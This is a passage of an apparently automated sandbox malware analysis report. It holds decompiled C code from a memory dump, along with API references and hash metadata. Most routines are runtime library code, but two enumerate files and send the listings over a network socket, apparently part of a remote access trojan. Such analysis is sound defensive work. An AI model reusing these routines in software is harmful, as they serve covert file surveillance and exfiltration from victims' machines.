                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                • EnumSystemLocalesW.KERNEL32(00450B93,00000001,?,?,m3D,?,00450F34,m3D,?,?,?,?,?,0044336D,?,?), ref: 00450902
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                • String ID: m3D
                • API String ID: 1084509184-982802904
                • Opcode ID: 26991cba7bbc86e1919f10754b8b785b2ecdf25adbba73174a712f5d5bc6d13d
                • Instruction ID: 5dea69f9d697fc4293d0711e1b08fce8c3201d78217ba2bcd737ffac06997e55
                • Opcode Fuzzy Hash: 26991cba7bbc86e1919f10754b8b785b2ecdf25adbba73174a712f5d5bc6d13d
                • Instruction Fuzzy Hash: A5F0283A3003055FDB146F359C81A66BB95EF81759F15883EFD418B642D675AC018744
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00442DCB,?,00000004), ref: 004471C0
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: InfoLocale
                • String ID: GetLocaleInfoEx
                • API String ID: 2299586839-2904428671
                • Opcode ID: 2c80f62870bc465dbeaf3c9209bb9ced0744fbcbc410adbe038e870c8c2fc236
                • Instruction ID: 1399f742e217acd12c1245ecdfc534ed39672f07150ba9ee3c651a9906310cab
                • Opcode Fuzzy Hash: 2c80f62870bc465dbeaf3c9209bb9ced0744fbcbc410adbe038e870c8c2fc236
                • Instruction Fuzzy Hash: 3BF0F031A44208BBDB11AF61DC06F6E7F65EF08701F00406AFC0966292CB798E15DAAE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00444AF0(signed int* _a4, signed int* _a8) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _v40;
                				signed int _v44;
                				signed int _v52;
                				signed int _v56;
                				signed int _v60;
                				signed int _v64;
                				signed int _v68;
                				signed int _v72;
                				signed int _v76;
                				signed int* _v80;
                				char _v540;
                				signed int _v544;
                				signed int _t197;
                				signed int _t198;
                				signed int* _t200;
                				signed int _t201;
                				signed int _t204;
                				signed int _t206;
                				signed int _t208;
                				signed int _t209;
                				signed int _t213;
                				signed int _t219;
                				intOrPtr _t225;
                				void* _t228;
                				signed int _t230;
                				signed int _t247;
                				signed int _t250;
                				void* _t253;
                				signed int _t256;
                				signed int* _t262;
                				signed int _t263;
                				signed int _t264;
                				void* _t265;
                				intOrPtr* _t266;
                				signed int _t267;
                				signed int _t269;
                				signed int _t270;
                				signed int _t271;
                				signed int _t272;
                				signed int* _t274;
                				signed int* _t278;
                				signed int _t279;
                				signed int _t280;
                				intOrPtr _t282;
                				void* _t286;
                				signed char _t292;
                				signed int _t295;
                				signed int _t303;
                				signed int _t306;
                				signed int _t307;
                				signed int _t309;
                				signed int _t311;
                				signed int _t313;
                				intOrPtr* _t314;
                				signed int _t318;
                				signed int _t322;
                				signed int* _t328;
                				signed int _t330;
                				signed int _t331;
                				signed int _t333;
                				void* _t334;
                				signed int _t336;
                				signed int _t338;
                				signed int _t341;
                				signed int _t342;
                				signed int* _t344;
                				signed int _t349;
                				signed int _t351;
                				void* _t355;
                				signed int _t359;
                				signed int _t360;
                				signed int _t362;
                				signed int* _t368;
                				signed int* _t369;
                				signed int* _t370;
                				signed int* _t373;
                
                				_t262 = _a4;
                				_t197 =  *_t262;
                				if(_t197 != 0) {
                					_t328 = _a8;
                					_t267 =  *_t328;
                					__eflags = _t267;
                					if(_t267 != 0) {
                						_t3 = _t197 - 1; // -1
                						_t349 = _t3;
                						_t4 = _t267 - 1; // -1
                						_t198 = _t4;
                						_v16 = _t349;
                						__eflags = _t198;
                						if(_t198 != 0) {
                							__eflags = _t198 - _t349;
                							if(_t198 > _t349) {
                								L23:
                								__eflags = 0;
                								return 0;
                							} else {
                								_t46 = _t198 + 1; // 0x0
                								_t306 = _t349 - _t198;
                								_v60 = _t46;
                								_t269 = _t349;
                								__eflags = _t349 - _t306;
                								if(_t349 < _t306) {
                									L21:
                									_t306 = _t306 + 1;
                									__eflags = _t306;
                								} else {
                									_t368 =  &(_t262[_t349 + 1]);
                									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
                									__eflags = _t341;
                									while(1) {
                										__eflags =  *_t341 -  *_t368;
                										if( *_t341 !=  *_t368) {
                											break;
                										}
                										_t269 = _t269 - 1;
                										_t341 = _t341 - 4;
                										_t368 = _t368 - 4;
                										__eflags = _t269 - _t306;
                										if(_t269 >= _t306) {
                											continue;
                										} else {
                											goto L21;
                										}
                										goto L22;
                									}
                									_t369 = _a8;
                									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
                									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
                									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
                										goto L21;
                									}
                								}
                								L22:
                								__eflags = _t306;
                								if(__eflags != 0) {
                									_t330 = _v60;
                									_t200 = _a8;
                									_t351 =  *(_t200 + _t330 * 4);
                									_t64 = _t330 * 4; // 0xffff0faa
                									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
                									_v36 = _t201;
                									asm("bsr eax, esi");
                									_v56 = _t351;
                									if(__eflags == 0) {
                										_t270 = 0x20;
                									} else {
                										_t270 = 0x1f - _t201;
                									}
                									_v40 = _t270;
                									_v64 = 0x20 - _t270;
                									__eflags = _t270;
                									if(_t270 != 0) {
                										_t292 = _v40;
                										_v36 = _v36 << _t292;
                										_v56 = _t351 << _t292 | _v36 >> _v64;
                										__eflags = _t330 - 2;
                										if(_t330 > 2) {
                											_t79 = _t330 * 4; // 0xe850ffff
                											_t81 =  &_v36;
                											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
                											__eflags =  *_t81;
                										}
                									}
                									_v76 = 0;
                									_t307 = _t306 + 0xffffffff;
                									__eflags = _t307;
                									_v32 = _t307;
                									if(_t307 < 0) {
                										_t331 = 0;
                										__eflags = 0;
                									} else {
                										_t85 =  &(_t262[1]); // 0x4
                										_v20 =  &(_t85[_t307]);
                										_t206 = _t307 + _t330;
                										_t90 = _t262 - 4; // -4
                										_v12 = _t206;
                										_t278 = _t90 + _t206 * 4;
                										_v80 = _t278;
                										do {
                											__eflags = _t206 - _v16;
                											if(_t206 > _v16) {
                												_t207 = 0;
                												__eflags = 0;
                											} else {
                												_t207 = _t278[2];
                											}
                											__eflags = _v40;
                											_t311 = _t278[1];
                											_t279 =  *_t278;
                											_v52 = _t207;
                											_v44 = 0;
                											_v8 = _t207;
                											_v24 = _t279;
                											if(_v40 > 0) {
                												_t318 = _v8;
                												_t336 = _t279 >> _v64;
                												_t230 = E00456040(_t311, _v40, _t318);
                												_t279 = _v40;
                												_t207 = _t318;
                												_t311 = _t336 | _t230;
                												_t359 = _v24 << _t279;
                												__eflags = _v12 - 3;
                												_v8 = _t318;
                												_v24 = _t359;
                												if(_v12 >= 3) {
                													_t279 = _v64;
                													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
                													__eflags = _t360;
                													_t207 = _v8;
                													_v24 = _t360;
                												}
                											}
                											_t208 = E00455CC0(_t311, _t207, _v56, 0);
                											_v44 = _t262;
                											_t263 = _t208;
                											_v44 = 0;
                											_t209 = _t311;
                											_v8 = _t263;
                											_v28 = _t209;
                											_t333 = _t279;
                											_v72 = _t263;
                											_v68 = _t209;
                											__eflags = _t209;
                											if(_t209 != 0) {
                												L40:
                												_t264 = _t263 + 1;
                												asm("adc eax, 0xffffffff");
                												_t333 = _t333 + E00455AC0(_t264, _t209, _v56, 0);
                												asm("adc esi, edx");
                												_t263 = _t264 | 0xffffffff;
                												_t209 = 0;
                												__eflags = 0;
                												_v44 = 0;
                												_v8 = _t263;
                												_v72 = _t263;
                												_v28 = 0;
                												_v68 = 0;
                											} else {
                												__eflags = _t263 - 0xffffffff;
                												if(_t263 > 0xffffffff) {
                													goto L40;
                												}
                											}
                											__eflags = 0;
                											if(0 <= 0) {
                												if(0 < 0) {
                													goto L44;
                												} else {
                													__eflags = _t333 - 0xffffffff;
                													if(_t333 <= 0xffffffff) {
                														while(1) {
                															L44:
                															_v8 = _v24;
                															_t228 = E00455AC0(_v36, 0, _t263, _t209);
                															__eflags = _t311 - _t333;
                															if(__eflags < 0) {
                																break;
                															}
                															if(__eflags > 0) {
                																L47:
                																_t209 = _v28;
                																_t263 = _t263 + 0xffffffff;
                																_v72 = _t263;
                																asm("adc eax, 0xffffffff");
                																_t333 = _t333 + _v56;
                																__eflags = _t333;
                																_v28 = _t209;
                																asm("adc dword [ebp-0x28], 0x0");
                																_v68 = _t209;
                																if(_t333 == 0) {
                																	__eflags = _t333 - 0xffffffff;
                																	if(_t333 <= 0xffffffff) {
                																		continue;
                																	} else {
                																	}
                																}
                															} else {
                																__eflags = _t228 - _v8;
                																if(_t228 <= _v8) {
                																	break;
                																} else {
                																	goto L47;
                																}
                															}
                															L51:
                															_v8 = _t263;
                															goto L52;
                														}
                														_t209 = _v28;
                														goto L51;
                													}
                												}
                											}
                											L52:
                											__eflags = _t209;
                											if(_t209 != 0) {
                												L54:
                												_t280 = _v60;
                												_t334 = 0;
                												_t355 = 0;
                												__eflags = _t280;
                												if(_t280 != 0) {
                													_t266 = _v20;
                													_t219 =  &(_a8[1]);
                													__eflags = _t219;
                													_v24 = _t219;
                													_v16 = _t280;
                													do {
                														_v44 =  *_t219;
                														_t225 =  *_t266;
                														_t286 = _t334 + _v72 * _v44;
                														asm("adc esi, edx");
                														_t334 = _t355;
                														_t355 = 0;
                														__eflags = _t225 - _t286;
                														if(_t225 < _t286) {
                															_t334 = _t334 + 1;
                															asm("adc esi, esi");
                														}
                														 *_t266 = _t225 - _t286;
                														_t266 = _t266 + 4;
                														_t219 = _v24 + 4;
                														_t164 =  &_v16;
                														 *_t164 = _v16 - 1;
                														__eflags =  *_t164;
                														_v24 = _t219;
                													} while ( *_t164 != 0);
                													_t263 = _v8;
                													_t280 = _v60;
                												}
                												__eflags = 0 - _t355;
                												if(__eflags <= 0) {
                													if(__eflags < 0) {
                														L63:
                														__eflags = _t280;
                														if(_t280 != 0) {
                															_t338 = _t280;
                															_t314 = _v20;
                															_t362 =  &(_a8[1]);
                															__eflags = _t362;
                															_t265 = 0;
                															do {
                																_t282 =  *_t314;
                																_t172 = _t362 + 4; // 0xa6a5959
                																_t362 = _t172;
                																_t314 = _t314 + 4;
                																asm("adc eax, eax");
                																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
                																asm("adc eax, 0x0");
                																_t265 = 0;
                																_t338 = _t338 - 1;
                																__eflags = _t338;
                															} while (_t338 != 0);
                															_t263 = _v8;
                														}
                														_t263 = _t263 + 0xffffffff;
                														asm("adc dword [ebp-0x18], 0xffffffff");
                													} else {
                														__eflags = _v52 - _t334;
                														if(_v52 < _t334) {
                															goto L63;
                														}
                													}
                												}
                												_t213 = _v12 - 1;
                												__eflags = _t213;
                												_v16 = _t213;
                											} else {
                												__eflags = _t263;
                												if(_t263 != 0) {
                													goto L54;
                												}
                											}
                											_t331 = 0 + _t263;
                											asm("adc esi, 0x0");
                											_v20 = _v20 - 4;
                											_t313 = _v32 - 1;
                											_t262 = _a4;
                											_t278 = _v80 - 4;
                											_t206 = _v12 - 1;
                											_v76 = _t331;
                											_v32 = _t313;
                											_v80 = _t278;
                											_v12 = _t206;
                											__eflags = _t313;
                										} while (_t313 >= 0);
                									}
                									_t309 = _v16 + 1;
                									_t204 = _t309;
                									__eflags = _t204 -  *_t262;
                									if(_t204 <  *_t262) {
                										_t191 = _t204 + 1; // 0x453b48
                										_t274 =  &(_t262[_t191]);
                										do {
                											 *_t274 = 0;
                											_t194 =  &(_t274[1]); // 0x91850fc2
                											_t274 = _t194;
                											_t204 = _t204 + 1;
                											__eflags = _t204 -  *_t262;
                										} while (_t204 <  *_t262);
                									}
                									 *_t262 = _t309;
                									__eflags = _t309;
                									if(_t309 != 0) {
                										while(1) {
                											_t271 =  *_t262;
                											__eflags = _t262[_t271];
                											if(_t262[_t271] != 0) {
                												goto L78;
                											}
                											_t272 = _t271 + 0xffffffff;
                											__eflags = _t272;
                											 *_t262 = _t272;
                											if(_t272 != 0) {
                												continue;
                											}
                											goto L78;
                										}
                									}
                									L78:
                									return _t331;
                								} else {
                									goto L23;
                								}
                							}
                						} else {
                							_t6 =  &(_t328[1]); // 0xfc23b5a
                							_t295 =  *_t6;
                							_v44 = _t295;
                							__eflags = _t295 - 1;
                							if(_t295 != 1) {
                								__eflags = _t349;
                								if(_t349 != 0) {
                									_t342 = 0;
                									_v12 = 0;
                									_v8 = 0;
                									_v20 = 0;
                									__eflags = _t349 - 0xffffffff;
                									if(_t349 != 0xffffffff) {
                										_t250 = _v16 + 1;
                										__eflags = _t250;
                										_v32 = _t250;
                										_t373 =  &(_t262[_t349 + 1]);
                										do {
                											_t253 = E00455CC0( *_t373, _t342, _t295, 0);
                											_v68 = _t303;
                											_t373 = _t373 - 4;
                											_v20 = _t262;
                											_t342 = _t295;
                											_t303 = 0 + _t253;
                											asm("adc ecx, 0x0");
                											_v12 = _t303;
                											_t34 =  &_v32;
                											 *_t34 = _v32 - 1;
                											__eflags =  *_t34;
                											_v8 = _v12;
                											_t295 = _v44;
                										} while ( *_t34 != 0);
                										_t262 = _a4;
                									}
                									_v544 = 0;
                									_t41 =  &(_t262[1]); // 0x4
                									_t370 = _t41;
                									 *_t262 = 0;
                									E00453D75(_t370, 0x1cc,  &_v540, 0);
                									_t247 = _v20;
                									__eflags = 0 - _t247;
                									 *_t370 = _t342;
                									_t262[2] = _t247;
                									asm("sbb ecx, ecx");
                									__eflags =  ~0x00000000;
                									 *_t262 = 0xbadbae;
                									return _v12;
                								} else {
                									_t14 =  &(_t262[1]); // 0x4
                									_t344 = _t14;
                									_v544 = 0;
                									 *_t262 = 0;
                									E00453D75(_t344, 0x1cc,  &_v540, 0);
                									_t256 = _t262[1];
                									_t322 = _t256 % _v44;
                									__eflags = 0 - _t322;
                									 *_t344 = _t322;
                									asm("sbb ecx, ecx");
                									__eflags = 0;
                									 *_t262 =  ~0x00000000;
                									return _t256 / _v44;
                								}
                							} else {
                								_t9 =  &(_t262[1]); // 0x4
                								_v544 = _t198;
                								 *_t262 = _t198;
                								E00453D75(_t9, 0x1cc,  &_v540, _t198);
                								__eflags = 0;
                								return _t262[1];
                							}
                						}
                					} else {
                						__eflags = 0;
                						return 0;
                					}
                				} else {
                					return _t197;
                				}
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • Opcode ID: 1785a8c4125c163fcd88b916b3e193c1c79f1356aa0cd0dcf8c48ed4e17e045f
                • Instruction ID: d4bb78e3d38a29ffe1297b84693c927112aa50585de5b24583ca26fbc7ad4fc8
                • Opcode Fuzzy Hash: 1785a8c4125c163fcd88b916b3e193c1c79f1356aa0cd0dcf8c48ed4e17e045f
                • Instruction Fuzzy Hash: 8D022C71E002199BEF14CFA9C8807AEB7F1FF88314F25816AD919E7385D734AE458B94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00418650(char* __edx, void* __eflags, char _a8) {
                				struct _WIN32_FIND_DATAW _v1028;
                				char _v1036;
                				char _v1064;
                				char _v1088;
                				void* _v1092;
                				char _v1100;
                				char _v1116;
                				void* _v1120;
                				char _v1128;
                				char _v1136;
                				char _v1152;
                				char _v1156;
                				char _v1160;
                				void* _v1164;
                				char _v1172;
                				char _v1176;
                				void* _v1188;
                				char _v1196;
                				void* _v1200;
                				void* _v1204;
                				char _v1208;
                				char _v1220;
                				char _v1224;
                				char _v1228;
                				char _v1232;
                				char _v1236;
                				char _v1240;
                				char _v1252;
                				void* __ebx;
                				void* __esi;
                				void* __ebp;
                				intOrPtr* _t63;
                				int _t85;
                				int _t91;
                				void* _t102;
                				void* _t109;
                				char* _t113;
                				void* _t115;
                				void* _t116;
                				void* _t130;
                				void* _t133;
                				void* _t228;
                				void* _t229;
                				void* _t234;
                				signed int _t235;
                				void* _t238;
                				void* _t239;
                				void* _t240;
                				void* _t243;
                
                				_t243 = __eflags;
                				_t213 = __edx;
                				_push(_t139);
                				_t63 = E00401F8B( &_a8);
                				E00404182( &_a8,  &_v1100, 4, 0xffffffff);
                				_t238 = (_t235 & 0xfffffff8) - 0x4b4;
                				E004020D6(_t139, _t238, __edx, _t243, 0x472ec8);
                				_t239 = _t238 - 0x18;
                				E004020D6(_t139, _t239, __edx, _t243,  &_v1116);
                				E0041A976( &_v1252, _t213);
                				_t240 = _t239 + 0x30;
                				_t228 =  *_t63 - 0x19;
                				if(_t228 == 0) {
                					E004020BF(_t139,  &_v1220);
                					_t213 = 0x473618;
                					E004087F0( &_v1172, 0x473618, _t234, L"\\*");
                					_t229 = FindFirstFileW(E00401EE4( &_v1172),  &_v1028);
                					__eflags = _t229 - 0xffffffff;
                					if(__eflags == 0) {
                						L14:
                						E004020D6(_t139, _t240 - 0x18, _t213, __eflags,  &_v1220);
                						_push(0x5d);
                						E00404A81(0x4737a0, _t213, __eflags);
                						E00401EE9();
                						E00401FB8();
                						goto L15;
                					}
                					E0040415E(_t139,  &_v1196, 0x473618, _t234,  &(_v1028.cFileName));
                					_t213 = 0x4644f0;
                					_t85 = E00406E2B(__eflags);
                					_t139 = _t85;
                					E00401EE9();
                					__eflags = _t85;
                					if(__eflags != 0) {
                						E00401FC2( &_v1228, 0x4644f0, _t229, E00402097(_t139,  &_v1196, 0x4644f0, _t234, __eflags,  &_v1028, 0x250));
                						E00401FB8();
                					}
                					while(1) {
                						__eflags = FindNextFileW(_t229,  &_v1028);
                						if(__eflags == 0) {
                							goto L14;
                						}
                						E0040415E(_t139,  &_v1196, _t213, _t234,  &(_v1028.cFileName));
                						_t213 = L"..";
                						_t91 = E00406E2B(__eflags);
                						_t139 = _t91;
                						E00401EE9();
                						__eflags = _t91;
                						if(__eflags != 0) {
                							L00403356(E00402097(_t139,  &_v1196, L"..", _t234, __eflags,  &_v1028, 0x250));
                							E00401FB8();
                						}
                					}
                					goto L14;
                				} else {
                					_t245 = _t228 == 1;
                					if(_t228 == 1) {
                						_t102 = E0041A7B9( &_v1152, E00401E45( &_v1232, _t213, _t234, _t245, 1));
                						E00402F85( &_v1176, E004087F0( &_v1128, 0x473618, _t234, "\\"), _t102);
                						E00401EE9();
                						E00401EE9();
                						E004020BF(_t139,  &_v1224);
                						E00401EE4( &_v1176);
                						_t213 =  &_v1224;
                						_t109 = E0041ADFE( &_v1224);
                						_t246 = _t109;
                						if(_t109 != 0) {
                							_t113 = E00401F8B(E00401E45(0x473298,  &_v1224, _t234, _t246, 0x1b));
                							_t247 =  *_t113 - 1;
                							if( *_t113 == 1) {
                								_t130 = E0040245C();
                								E0040632B( &_v1028, E00401F8B(0x473280), _t130);
                								_t133 = E0040245C();
                								E00401FC2( &_v1240, _t213, 0x473280, E0040644C(_t139,  &_v1036, _t213,  &_v1156, E00401F8B( &_v1228), _t133));
                								E00401FB8();
                							}
                							_t115 = E00401E45( &_v1232, _t213, _t234, _t247, 2);
                							_t116 = E00401E45( &_v1236, _t213, _t234, _t247, 0);
                							_t213 = E00402EF0(_t139,  &_v1160, E00402EF0(_t139,  &_v1136, E00402EF0(_t139,  &_v1088, E00402EF0(_t139,  &_v1064, E00402F11( &_v1208, E00401E45( &_v1240, _t213, _t234, _t247, 1), _t234, 0x472ec8), _t234, _t247, _t116), _t234, _t247, 0x472ec8), _t234, _t247, _t115), _t234, _t247, 0x472ec8);
                							E00402EF0(_t139, _t240 - 0x18, _t122, _t234, _t247,  &_v1220);
                							_push(0x5e);
                							E00404A81(0x4737a0, _t122, _t247);
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                							E00401FB8();
                						}
                						E00401FB8();
                						E00401EE9();
                					}
                					L15:
                					E00401E6D( &_v1232, _t213);
                					E00401FB8();
                					return E00401FB8();
                				}
                			}

                APIs
                • FindFirstFileW.KERNEL32(00000000,?), ref: 004188A6
                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418972
                  • Part of subcall function 0041ADFE: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$Find$CreateFirstNext
                • String ID:
                • API String ID: 341183262-0
                • Opcode ID: 91937f40c01ea410f094f55ffba3d5842e82071e299bfae1d30aaf5aaec0e015
                • Instruction ID: 4e170b996662dc82c888af41f7fe9c50681d869d22ff8177fab8d840ae628c7b
                • Opcode Fuzzy Hash: 91937f40c01ea410f094f55ffba3d5842e82071e299bfae1d30aaf5aaec0e015
                • Instruction Fuzzy Hash: C68162715082415BC314FB62C896DEFB3A9AF90308F50493FF546631E2EF389A49C69E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E00406EB0(char _a4) {
                				void* _v16;
                				struct _WIN32_FIND_DATAW _v596;
                				char _v620;
                				void* _v632;
                				char _v644;
                				void* _v648;
                				char _v652;
                				void* _v656;
                				char _v668;
                				char _v676;
                				void* _v700;
                				void* __ebx;
                				void* __esi;
                				void* __ebp;
                				int _t29;
                				void* _t34;
                				void* _t49;
                				void* _t71;
                				void* _t74;
                				void* _t75;
                				void* _t77;
                
                				_t74 = FindFirstFileW(E00401EE4( &_a4),  &_v596);
                				_t80 = _t74 - 0xffffffff;
                				if(_t74 != 0xffffffff) {
                					E004020BF(_t49,  &_v668);
                					E0040415E(_t49,  &_v644, _t71, _t75,  &(_v596.cFileName));
                					_t72 = 0x4644f0;
                					_t29 = E00406E2B(__eflags);
                					_t50 = _t29;
                					E00401EE9();
                					__eflags = _t29;
                					if(__eflags != 0) {
                						E00401FC2( &_v676, 0x4644f0, _t74, E00402097(_t50,  &_v644, 0x4644f0, 0x250, __eflags,  &_v596, 0x250));
                						L5:
                						E00401FB8();
                					}
                					__eflags = FindNextFileW(_t74,  &_v596);
                					if(__eflags != 0) {
                						_t34 = E00402097(_t50,  &_v620, _t72, 0x250, __eflags,  &_v596, 0x250);
                						_t72 =  &_v676;
                						E00401FC2( &_v676,  &_v676, _t74, E004087CF(_t50,  &_v652,  &_v676, 0x250, __eflags, _t34));
                						E00401FB8();
                						goto L5;
                					}
                					E004020D6(_t50, _t77 - 0x18, _t72, __eflags,  &_v668);
                					_push(0x50);
                					E00404A81(0x472fc0, _t72, __eflags);
                					E00401FB8();
                				} else {
                					E0041A879(_t49, _t77 - 0x18,  &_a4);
                					_push(0x54);
                					E00404A81(0x472fc0,  &_a4, _t80);
                				}
                				return E00401EE9();
                			}

                APIs
                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ECB
                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406F93
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: FileFind$FirstNextsend
                • String ID:
                • API String ID: 4113138495-0
                • Opcode ID: 96a87b9ec78d820a9482a85bf725c28b27542f83699857228d430aa977a05954
                • Instruction ID: da33ce525bc8868546fe2e6bcae83f091993c6b7fab0c7b7f9de5ed664394571
                • Opcode Fuzzy Hash: 96a87b9ec78d820a9482a85bf725c28b27542f83699857228d430aa977a05954
                • Instruction Fuzzy Hash: F92143311043015BC714FB61DD96DEFB7ACEF90358F400A3EF596621D1EF389A09865A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00451BAB(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                				signed int _t172;
                				signed int _t175;
                				signed int _t178;
                				signed int* _t179;
                				signed int _t195;
                				signed int _t199;
                				signed int _t202;
                				void* _t203;
                				void* _t206;
                				signed int _t209;
                				void* _t210;
                				signed int _t225;
                				unsigned int* _t240;
                				signed char _t242;
                				signed int* _t250;
                				unsigned int* _t256;
                				signed int* _t257;
                				signed char _t259;
                				long _t262;
                				signed int* _t265;
                
                				 *(_a4 + 4) = 0;
                				_t262 = 0xc000000d;
                				 *(_a4 + 8) = 0;
                				 *(_a4 + 0xc) = 0;
                				_t242 = _a12;
                				if((_t242 & 0x00000010) != 0) {
                					_t262 = 0xc000008f;
                					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                				}
                				if((_t242 & 0x00000002) != 0) {
                					_t262 = 0xc0000093;
                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                				}
                				if((_t242 & 0x00000001) != 0) {
                					_t262 = 0xc0000091;
                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                				}
                				if((_t242 & 0x00000004) != 0) {
                					_t262 = 0xc000008e;
                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                				}
                				if((_t242 & 0x00000008) != 0) {
                					_t262 = 0xc0000090;
                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                				}
                				_t265 = _a8;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                				_t259 = E004521DE(_a4);
                				if((_t259 & 0x00000001) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                				}
                				if((_t259 & 0x00000004) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                				}
                				if((_t259 & 0x00000008) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                				}
                				if((_t259 & 0x00000010) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                				}
                				if((_t259 & 0x00000020) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                				}
                				_t172 =  *_t265 & 0x00000c00;
                				if(_t172 == 0) {
                					 *_a4 =  *_a4 & 0xfffffffc;
                				} else {
                					if(_t172 == 0x400) {
                						_t257 = _a4;
                						_t225 =  *_t257 & 0xfffffffd | 1;
                						L26:
                						 *_t257 = _t225;
                						L29:
                						_t175 =  *_t265 & 0x00000300;
                						if(_t175 == 0) {
                							_t250 = _a4;
                							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                							L35:
                							 *_t250 = _t178;
                							L36:
                							_t179 = _a4;
                							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                							if(_a28 == 0) {
                								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                								 *((long long*)(_a4 + 0x10)) =  *_a20;
                								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                								_t254 = _a4;
                								_t240 = _a24;
                								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                								 *(_a4 + 0x50) =  *_t240;
                							} else {
                								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                								_t240 = _a24;
                								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                								 *(_a4 + 0x50) =  *_t240;
                							}
                							E00452144(_t254);
                							RaiseException(_t262, 0, 1,  &_a4);
                							_t256 = _a4;
                							if((_t256[2] & 0x00000010) != 0) {
                								 *_t265 =  *_t265 & 0xfffffffe;
                							}
                							if((_t256[2] & 0x00000008) != 0) {
                								 *_t265 =  *_t265 & 0xfffffffb;
                							}
                							if((_t256[2] & 0x00000004) != 0) {
                								 *_t265 =  *_t265 & 0xfffffff7;
                							}
